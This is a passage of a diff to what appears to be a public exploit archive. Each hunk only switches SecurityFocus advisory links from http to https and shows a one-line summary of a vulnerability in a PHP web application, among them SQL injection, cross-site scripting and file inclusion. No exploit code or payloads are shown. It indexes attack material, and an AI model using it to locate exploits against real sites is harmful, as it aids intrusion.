+1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29890.txt b/exploits/php/webapps/29890.txt index 8bf0a92aa..0ea3ff414 100644 --- a/exploits/php/webapps/29890.txt +++ b/exploits/php/webapps/29890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29891.txt b/exploits/php/webapps/29891.txt index 8662b0c9a..b4a142205 100644 --- a/exploits/php/webapps/29891.txt +++ b/exploits/php/webapps/29891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29892.html b/exploits/php/webapps/29892.html index f932dd1b9..b8f7a7723 100644 --- a/exploits/php/webapps/29892.html +++ b/exploits/php/webapps/29892.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29893.txt b/exploits/php/webapps/29893.txt index ac6700e5c..6744dc600 100644 --- a/exploits/php/webapps/29893.txt +++ b/exploits/php/webapps/29893.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29894.txt b/exploits/php/webapps/29894.txt index 85523d374..65fffa6e2 100644 --- a/exploits/php/webapps/29894.txt +++ b/exploits/php/webapps/29894.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23616/info +source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29895.txt b/exploits/php/webapps/29895.txt index acc7e850b..7e8a8832e 100644 --- a/exploits/php/webapps/29895.txt +++ b/exploits/php/webapps/29895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23624/info +source: https://www.securityfocus.com/bid/23624/info phpMyAdmin is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29898.txt b/exploits/php/webapps/29898.txt index 3ff553d98..3b4c06408 100644 --- a/exploits/php/webapps/29898.txt +++ b/exploits/php/webapps/29898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23639/info +source: https://www.securityfocus.com/bid/23639/info Plesk is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29899.txt b/exploits/php/webapps/29899.txt index 55836cbad..bf7d22b95 100644 --- a/exploits/php/webapps/29899.txt +++ b/exploits/php/webapps/29899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23646/info +source: https://www.securityfocus.com/bid/23646/info MyNewsGroups is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29902.txt b/exploits/php/webapps/29902.txt index 60b5ee0eb..4eae90a08 100644 --- a/exploits/php/webapps/29902.txt +++ b/exploits/php/webapps/29902.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23657/info +source: https://www.securityfocus.com/bid/23657/info PHPMyTGP is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29903.txt b/exploits/php/webapps/29903.txt index b0cb25765..b078c6982 100644 --- a/exploits/php/webapps/29903.txt +++ b/exploits/php/webapps/29903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23658/info +source: https://www.securityfocus.com/bid/23658/info Ahhp Portal is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29904.txt b/exploits/php/webapps/29904.txt index 101225513..c62ba810a 100644 --- a/exploits/php/webapps/29904.txt +++ b/exploits/php/webapps/29904.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29905.txt b/exploits/php/webapps/29905.txt index 489883ff2..bf8d27ad9 100644 --- a/exploits/php/webapps/29905.txt +++ b/exploits/php/webapps/29905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29906.txt b/exploits/php/webapps/29906.txt index d6be17022..5d0571e9c 100644 --- a/exploits/php/webapps/29906.txt +++ b/exploits/php/webapps/29906.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23659/info +source: https://www.securityfocus.com/bid/23659/info B2 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29907.txt b/exploits/php/webapps/29907.txt index b6082360e..e72b3a27e 100644 --- a/exploits/php/webapps/29907.txt +++ b/exploits/php/webapps/29907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23661/info +source: https://www.securityfocus.com/bid/23661/info Comus is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29908.txt b/exploits/php/webapps/29908.txt index 98657ef9c..55a91d6ea 100644 --- a/exploits/php/webapps/29908.txt +++ b/exploits/php/webapps/29908.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23662/info +source: https://www.securityfocus.com/bid/23662/info Sunshop is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29909.txt b/exploits/php/webapps/29909.txt index 5c91f0561..1ff5ee24b 100644 --- a/exploits/php/webapps/29909.txt +++ b/exploits/php/webapps/29909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23663/info +source: https://www.securityfocus.com/bid/23663/info HYIP Manager Pro is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29910.txt b/exploits/php/webapps/29910.txt index 0973a1e32..3c15e9c25 100644 --- a/exploits/php/webapps/29910.txt +++ b/exploits/php/webapps/29910.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23664/info +source: https://www.securityfocus.com/bid/23664/info htmlEditbox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29911.txt b/exploits/php/webapps/29911.txt index f688847bb..01f350888 100644 --- a/exploits/php/webapps/29911.txt +++ b/exploits/php/webapps/29911.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23667/info +source: https://www.securityfocus.com/bid/23667/info DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29912.txt b/exploits/php/webapps/29912.txt index 56733416a..4d8d1c614 100644 --- a/exploits/php/webapps/29912.txt +++ b/exploits/php/webapps/29912.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23667/info +source: https://www.securityfocus.com/bid/23667/info DynaTracker is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29913.txt b/exploits/php/webapps/29913.txt index bb2c30394..825ebe2fb 100644 --- a/exploits/php/webapps/29913.txt +++ b/exploits/php/webapps/29913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23670/info +source: https://www.securityfocus.com/bid/23670/info Active PHP Bookmarks is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29914.txt b/exploits/php/webapps/29914.txt index 4651b61a8..122acdebd 100644 --- a/exploits/php/webapps/29914.txt +++ b/exploits/php/webapps/29914.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23675/info +source: https://www.securityfocus.com/bid/23675/info Doruk100Net is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29915.txt b/exploits/php/webapps/29915.txt index 0e04592d5..87a084fae 100644 --- a/exploits/php/webapps/29915.txt +++ b/exploits/php/webapps/29915.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23676/info +source: https://www.securityfocus.com/bid/23676/info MoinMoin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29938.txt b/exploits/php/webapps/29938.txt index 953fcbb18..a8d18e996 100644 --- a/exploits/php/webapps/29938.txt +++ b/exploits/php/webapps/29938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23727/info +source: https://www.securityfocus.com/bid/23727/info E-Annu is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29941.txt b/exploits/php/webapps/29941.txt index 3a04e18c7..01d8d1542 100644 --- a/exploits/php/webapps/29941.txt +++ b/exploits/php/webapps/29941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23753/info +source: https://www.securityfocus.com/bid/23753/info CMS Made Simple is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29944.pl b/exploits/php/webapps/29944.pl index f2f2432fb..d4425def1 100755 --- a/exploits/php/webapps/29944.pl +++ b/exploits/php/webapps/29944.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23801/info +source: https://www.securityfocus.com/bid/23801/info PHPSecurityAdmin is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29953.txt b/exploits/php/webapps/29953.txt index aa68db4db..19d61f392 100644 --- a/exploits/php/webapps/29953.txt +++ b/exploits/php/webapps/29953.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23843/info +source: https://www.securityfocus.com/bid/23843/info PHP Content Architect is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29955.txt b/exploits/php/webapps/29955.txt index 996728547..765ca140f 100644 --- a/exploits/php/webapps/29955.txt +++ b/exploits/php/webapps/29955.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23845/info +source: https://www.securityfocus.com/bid/23845/info The WF-Quote module for the Xoops CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29956.txt b/exploits/php/webapps/29956.txt index 590d79265..a22c30737 100644 --- a/exploits/php/webapps/29956.txt +++ b/exploits/php/webapps/29956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23847/info +source: https://www.securityfocus.com/bid/23847/info Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29957.txt b/exploits/php/webapps/29957.txt index c8438a1c6..31a9ccdc7 100644 --- a/exploits/php/webapps/29957.txt +++ b/exploits/php/webapps/29957.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23847/info +source: https://www.securityfocus.com/bid/23847/info Mini Web Shop is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29960.txt b/exploits/php/webapps/29960.txt index f98f3ea7c..8ba0e5967 100644 --- a/exploits/php/webapps/29960.txt +++ b/exploits/php/webapps/29960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23856/info +source: https://www.securityfocus.com/bid/23856/info TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29961.txt b/exploits/php/webapps/29961.txt index 0385d682b..6d757d81e 100644 --- a/exploits/php/webapps/29961.txt +++ b/exploits/php/webapps/29961.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23856/info +source: https://www.securityfocus.com/bid/23856/info TurnkeyWebTools SunShop Shopping Cart is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29963.txt b/exploits/php/webapps/29963.txt index 913f7fb4b..8f00221bf 100644 --- a/exploits/php/webapps/29963.txt +++ b/exploits/php/webapps/29963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23864/info +source: https://www.securityfocus.com/bid/23864/info Kayako eSupport is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29965.txt b/exploits/php/webapps/29965.txt index 39d5048d5..4a4f81607 100644 --- a/exploits/php/webapps/29965.txt +++ b/exploits/php/webapps/29965.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23873/info +source: https://www.securityfocus.com/bid/23873/info Advanced Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29966.txt b/exploits/php/webapps/29966.txt index 71219b930..111094d2d 100644 --- a/exploits/php/webapps/29966.txt +++ b/exploits/php/webapps/29966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29967.txt b/exploits/php/webapps/29967.txt index 459bf6036..33db2ab72 100644 --- a/exploits/php/webapps/29967.txt +++ b/exploits/php/webapps/29967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29968.txt b/exploits/php/webapps/29968.txt index c8419ba88..752fa797f 100644 --- a/exploits/php/webapps/29968.txt +++ b/exploits/php/webapps/29968.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29969.txt b/exploits/php/webapps/29969.txt index 0fa72650d..d33a080f2 100644 --- a/exploits/php/webapps/29969.txt +++ b/exploits/php/webapps/29969.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29970.txt b/exploits/php/webapps/29970.txt index d8ce298a0..48800ca97 100644 --- a/exploits/php/webapps/29970.txt +++ b/exploits/php/webapps/29970.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29971.txt b/exploits/php/webapps/29971.txt index f95eeda99..176a332a1 100644 --- a/exploits/php/webapps/29971.txt +++ b/exploits/php/webapps/29971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29972.txt b/exploits/php/webapps/29972.txt index 34189850d..e0499ee3c 100644 --- a/exploits/php/webapps/29972.txt +++ b/exploits/php/webapps/29972.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29973.txt b/exploits/php/webapps/29973.txt index 8566dd558..a20e6a3b1 100644 --- a/exploits/php/webapps/29973.txt +++ b/exploits/php/webapps/29973.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29974.txt b/exploits/php/webapps/29974.txt index 6fe28b9d9..f3f7790e5 100644 --- a/exploits/php/webapps/29974.txt +++ b/exploits/php/webapps/29974.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29975.txt b/exploits/php/webapps/29975.txt index 739430cb8..55fef622e 100644 --- a/exploits/php/webapps/29975.txt +++ b/exploits/php/webapps/29975.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29976.txt b/exploits/php/webapps/29976.txt index 53a0a0dd2..3115a99a9 100644 --- a/exploits/php/webapps/29976.txt +++ b/exploits/php/webapps/29976.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29977.txt b/exploits/php/webapps/29977.txt index f6944727e..230c445b8 100644 --- a/exploits/php/webapps/29977.txt +++ b/exploits/php/webapps/29977.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29978.txt b/exploits/php/webapps/29978.txt index 1b8257b0a..dfb6e087b 100644 --- a/exploits/php/webapps/29978.txt +++ b/exploits/php/webapps/29978.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29979.txt b/exploits/php/webapps/29979.txt index ee7c50f80..de392ac3c 100644 --- a/exploits/php/webapps/29979.txt +++ b/exploits/php/webapps/29979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29980.txt b/exploits/php/webapps/29980.txt index ea852b0f1..d10ba8b16 100644 --- a/exploits/php/webapps/29980.txt +++ b/exploits/php/webapps/29980.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29981.txt b/exploits/php/webapps/29981.txt index f5e949008..7994ff24a 100644 --- a/exploits/php/webapps/29981.txt +++ b/exploits/php/webapps/29981.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29982.txt b/exploits/php/webapps/29982.txt index e3fc898c9..09952b664 100644 --- a/exploits/php/webapps/29982.txt +++ b/exploits/php/webapps/29982.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29983.txt b/exploits/php/webapps/29983.txt index 67aa10992..ec87a68a4 100644 --- a/exploits/php/webapps/29983.txt +++ b/exploits/php/webapps/29983.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29984.txt b/exploits/php/webapps/29984.txt index 4f243f8f1..ca9e4fe39 100644 --- a/exploits/php/webapps/29984.txt +++ b/exploits/php/webapps/29984.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29985.txt b/exploits/php/webapps/29985.txt index cde0eb123..0db58ad43 100644 --- a/exploits/php/webapps/29985.txt +++ b/exploits/php/webapps/29985.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29986.txt b/exploits/php/webapps/29986.txt index 5a55ada5d..60e33b592 100644 --- a/exploits/php/webapps/29986.txt +++ b/exploits/php/webapps/29986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29987.txt b/exploits/php/webapps/29987.txt index 2e806cafe..2fb823ab7 100644 --- a/exploits/php/webapps/29987.txt +++ b/exploits/php/webapps/29987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29988.txt b/exploits/php/webapps/29988.txt index 1742c4003..2444a11a0 100644 --- a/exploits/php/webapps/29988.txt +++ b/exploits/php/webapps/29988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29989.txt b/exploits/php/webapps/29989.txt index 930f17ff9..a9ce0a59b 100644 --- a/exploits/php/webapps/29989.txt +++ b/exploits/php/webapps/29989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29990.txt b/exploits/php/webapps/29990.txt index 49210e9b2..6197f0b4b 100644 --- a/exploits/php/webapps/29990.txt +++ b/exploits/php/webapps/29990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29991.txt b/exploits/php/webapps/29991.txt index 164430a80..88dcdc356 100644 --- a/exploits/php/webapps/29991.txt +++ b/exploits/php/webapps/29991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29992.txt b/exploits/php/webapps/29992.txt index 69d0ab28f..ad122fecb 100644 --- a/exploits/php/webapps/29992.txt +++ b/exploits/php/webapps/29992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29993.txt b/exploits/php/webapps/29993.txt index 96e79d9cb..bfac5c4e9 100644 --- a/exploits/php/webapps/29993.txt +++ b/exploits/php/webapps/29993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29994.txt b/exploits/php/webapps/29994.txt index 7893dc71c..de302b981 100644 --- a/exploits/php/webapps/29994.txt +++ b/exploits/php/webapps/29994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29995.txt b/exploits/php/webapps/29995.txt index d08d0ef05..5ed697e65 100644 --- a/exploits/php/webapps/29995.txt +++ b/exploits/php/webapps/29995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29996.txt b/exploits/php/webapps/29996.txt index 7582d6c54..59e031241 100644 --- a/exploits/php/webapps/29996.txt +++ b/exploits/php/webapps/29996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29997.txt b/exploits/php/webapps/29997.txt index c1e1b3793..c89d895b1 100644 --- a/exploits/php/webapps/29997.txt +++ b/exploits/php/webapps/29997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29998.txt b/exploits/php/webapps/29998.txt index a302fb5d2..cd8ba5b10 100644 --- a/exploits/php/webapps/29998.txt +++ b/exploits/php/webapps/29998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/29999.txt b/exploits/php/webapps/29999.txt index b3b1c7c76..17ad4ac8c 100644 --- a/exploits/php/webapps/29999.txt +++ b/exploits/php/webapps/29999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30003.txt b/exploits/php/webapps/30003.txt index d9ef06c5e..e07fb6293 100644 --- a/exploits/php/webapps/30003.txt +++ b/exploits/php/webapps/30003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30004.txt b/exploits/php/webapps/30004.txt index 9933c937a..ee62ea38b 100644 --- a/exploits/php/webapps/30004.txt +++ b/exploits/php/webapps/30004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30005.txt b/exploits/php/webapps/30005.txt index 7f1f8ae7b..1310d450b 100644 --- a/exploits/php/webapps/30005.txt +++ b/exploits/php/webapps/30005.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30006.txt b/exploits/php/webapps/30006.txt index 90034fcd4..08f011906 100644 --- a/exploits/php/webapps/30006.txt +++ b/exploits/php/webapps/30006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23874/info +source: https://www.securityfocus.com/bid/23874/info Campsite is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/30015.txt b/exploits/php/webapps/30015.txt index eff46c57d..2cebb60fd 100644 --- a/exploits/php/webapps/30015.txt +++ b/exploits/php/webapps/30015.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23876/info +source: https://www.securityfocus.com/bid/23876/info Advanced Guestbook is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30022.txt b/exploits/php/webapps/30022.txt index 2c5ead203..e2150319a 100644 --- a/exploits/php/webapps/30022.txt +++ b/exploits/php/webapps/30022.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23917/info +source: https://www.securityfocus.com/bid/23917/info PHP Multi User Randomizer is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30027.txt b/exploits/php/webapps/30027.txt index 1d523b45f..9156b8aaf 100644 --- a/exploits/php/webapps/30027.txt +++ b/exploits/php/webapps/30027.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23950/info +source: https://www.securityfocus.com/bid/23950/info CommuniGate Pro is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/30028.txt b/exploits/php/webapps/30028.txt index 650055539..c24f9a9dd 100644 --- a/exploits/php/webapps/30028.txt +++ b/exploits/php/webapps/30028.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23951/info +source: https://www.securityfocus.com/bid/23951/info EQDKP is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30029.txt b/exploits/php/webapps/30029.txt index 534e4ab49..3273ca238 100644 --- a/exploits/php/webapps/30029.txt +++ b/exploits/php/webapps/30029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23963/info +source: https://www.securityfocus.com/bid/23963/info SonicBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/30035.txt b/exploits/php/webapps/30035.txt index 32b844707..3c3713c22 100644 --- a/exploits/php/webapps/30035.txt +++ b/exploits/php/webapps/30035.txt @@ -1,4 +1,4 @@ -source: 